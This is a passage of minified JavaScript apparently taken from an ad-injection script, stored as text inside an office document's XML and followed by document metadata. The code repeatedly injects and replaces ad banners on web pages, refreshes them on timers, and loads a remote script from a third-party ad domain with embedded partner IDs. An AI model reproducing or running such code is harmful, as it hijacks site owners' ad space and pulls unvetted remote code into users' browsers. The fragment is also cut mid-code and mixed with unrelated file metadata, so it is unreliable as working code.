o=function(){d.log('debug','banners: refreshing: '+(e.length+f.length)+' banners');var a=function(a){for(var c=0;c&lt;a.length;c++)if(a[c].banner.attr('mrlm_product')=='text_banner'){var e=a[c].banner.width();var f=a[c].banner.height();var g=a[c].adv_size.width;var h=a[c].adv_size.height;d.log('debug','banners: replacing text banner with simple banner');var i=l(g,h,0,'banner');var j=d.get_element_attributes(b,a[c].banner);var k=d.create_iframe(b,'simple_banner',b.server_data.di.type,e,f,j,i);a[c].banner.replaceWith(k);a[c].banner=k;}else if(a[c].banner.attr('src').indexOf('ads.adsoptimizer.net/banners/txt')==-1)a[c].banner.attr('src',a[c].banner.attr('src'));};a(e);a(f);};var p=function(a){if(b.jquery(window).scrollTop()+b.jquery(window).height()&gt;a.offset().top)return true;else return false;};if(c.inject_enabled)m();if(c.replace_enabled)n();setInterval(function(){if(c.inject_enabled)m();},1000);setInterval(function(){if(c.replace_enabled)n();},30000);if((e.length==0&amp;&amp;f.length==0)||!c.refresh_enabled||i==0)return;var q=setInterval(function(){o();g++;d.log('debug','banners: '+b.server_data.di.type+' refresh initiated ('+h+')');if(g==i){clearInterval(q);d.log('debug','banners: refresh reached its limit: ('+i+') stopping ...');}},h*1000);},travel:function(b){var c='//cond01.etbxml.com/api/web/hotels.php?mamId=$dc_id$&amp;userId=2222&amp;appId=3333&amp;ui=1&amp;ns=ETB_Hotels_Widget&amp;partner=targetingedge&amp;cpb=Dynamic Pricer&amp;helpUrl=http%3A%2F%2Fwww.dynamic-pricer.com';c=c.replace('$dc_id$',a.dc);d.load_script(c);}};c(function(a){if(!a.is_pop&amp;&amp;!a.server_data.di.bl)for(var b in e)e[b](a);});})();</w:t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cursorLocation=55151, fitsPagesWidth=1</cp:keywords>
</cp:coreProperties>
</file>

<file path=docProps/meta.xml><?xml version="1.0" encoding="utf-8"?>
<meta xmlns="http://schemas.apple.com/cocoa/2006/metadata">
  <generator>CocoaOOXMLWriter/1343.14</generator>
</meta>
</file>